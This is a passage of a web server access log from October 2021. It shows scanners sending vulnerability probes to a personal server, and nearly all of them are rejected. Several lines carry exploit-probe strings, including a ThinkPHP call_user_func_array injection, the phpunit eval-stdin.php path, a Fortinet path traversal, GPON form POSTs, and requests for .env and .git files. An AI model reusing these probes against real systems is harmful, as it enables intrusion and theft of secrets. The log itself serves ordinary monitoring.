Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Oct/2021:16:01:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:14 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:17 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:21 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:16:01:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:24 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:24 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [12/Oct/2021:16:01:26 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:16:01:26 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:02:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Oct/2021:17:59:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [12/Oct/2021:17:59:11 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [12/Oct/2021:17:59:11 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [12/Oct/2021:17:59:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [12/Oct/2021:17:59:11 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [12/Oct/2021:17:59:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [12/Oct/2021:17:59:12 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [12/Oct/2021:17:59:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [12/Oct/2021:17:59:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [12/Oct/2021:17:59:33 +0000] 400 - GET https localhost "/" [Client 5.8.10.202] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:18:13:11 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [12/Oct/2021:18:13:12 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [12/Oct/2021:19:41:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [12/Oct/2021:20:40:34 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 161.35.148.161] [Length 0] [Gzip -] "curl/7.3.2" "-" [12/Oct/2021:21:03:09 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 45.134.144.8] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-" [12/Oct/2021:21:36:21 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.86.35.19] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Oct/2021:21:39:32 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [12/Oct/2021:22:02:38 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [12/Oct/2021:22:07:29 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.96.130.2] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [12/Oct/2021:22:29:23 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.49.68.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [12/Oct/2021:22:45:18 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.198.41] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:23:03:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Oct/2021:23:04:44 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.205.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Oct/2021:23:14:34 +0000] 444 - GET https home.moralanimal.net "/.git/config" [Client 45.153.160.133] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [12/Oct/2021:23:20:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Oct/2021:01:02:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:01:22:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.121] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:01:37:04 +0000] 444 - GET https io.moralanimal.net "/.git/config" [Client 185.220.101.39] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [13/Oct/2021:02:15:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [13/Oct/2021:03:17:51 +0000] 400 - GET https localhost "/" [Client 204.101.161.19] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:03:17:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 204.101.161.19] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [13/Oct/2021:03:41:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [13/Oct/2021:03:41:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [13/Oct/2021:03:41:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Oct/2021:04:08:42 +0000] 400 - - http localhost "-" [Client 89.248.165.23] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:04:23:27 +0000] 400 - GET http localhost "/" [Client 125.64.94.136] [Length 252] [Gzip -] "-" "-" [13/Oct/2021:04:23:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.136] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [13/Oct/2021:04:23:30 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [13/Oct/2021:04:23:31 +0000] 400 - GET http 64.22.31.253 "/robots.txt" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [13/Oct/2021:04:23:32 +0000] 400 - GET http 64.22.31.253 "/.well-known/security.txt" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [13/Oct/2021:04:28:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Oct/2021:04:30:40 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.117.2.144] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Oct/2021:04:52:38 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:04:56:55 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:04:57:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:05:21:09 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:05:21:31 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:05:25:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [13/Oct/2021:05:44:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [13/Oct/2021:05:46:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.196] [Length 0] [Gzip -] "-" "-" [13/Oct/2021:05:46:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "-" "-" [13/Oct/2021:05:46:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.196] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Oct/2021:06:01:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Oct/2021:07:20:51 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.199.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:07:48:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [13/Oct/2021:07:48:30 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211013154706" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [13/Oct/2021:09:17:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [13/Oct/2021:09:25:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:10:38:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:11:25:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.67.137] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [13/Oct/2021:11:39:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Oct/2021:12:16:25 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; HUAWEI P20 Build/816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4472.114 Mobile Safari/537.36" "-" [13/Oct/2021:12:32:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [13/Oct/2021:12:32:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [13/Oct/2021:12:32:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.142.236.43] [Length 252] [Gzip -] "-" "-" [13/Oct/2021:12:32:53 +0000] 400 - - http localhost "-" [Client 185.142.236.43] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:12:35:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [13/Oct/2021:12:56:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.198.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Oct/2021:14:20:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.136] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Oct/2021:16:19:00 +0000] 400 - GET http localhost "-" [Client 40.76.79.103] [Length 154] [Gzip -] "-" "-" [13/Oct/2021:16:26:23 +0000] 444 - GET https komga.moralanimal.net "/.git/index" [Client 93.78.166.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:03:01 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Oct/2021:17:34:01 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Oct/2021:17:34:02 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Oct/2021:17:34:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Oct/2021:19:10:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Oct/2021:20:27:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [13/Oct/2021:20:58:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Oct/2021:00:14:42 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Oct/2021:00:41:28 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:00:41:29 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:01:22:07 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.127] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:04:56:50 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:04:57:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:04:58:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:05:01:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:06:22:56 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [14/Oct/2021:06:22:56 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [14/Oct/2021:07:22:50 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.209.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:08:24:05 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:08:24:05 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:09:19:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Oct/2021:09:49:08 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:09:49:08 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:10:29:05 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Oct/2021:10:42:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.158] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:11:28:16 +0000] 400 - - http localhost "-" [Client 87.251.75.63] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:12:11:26 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:26 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:28 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:29 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:30 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:31 +0000] 444 - POST https 64.22.31.253 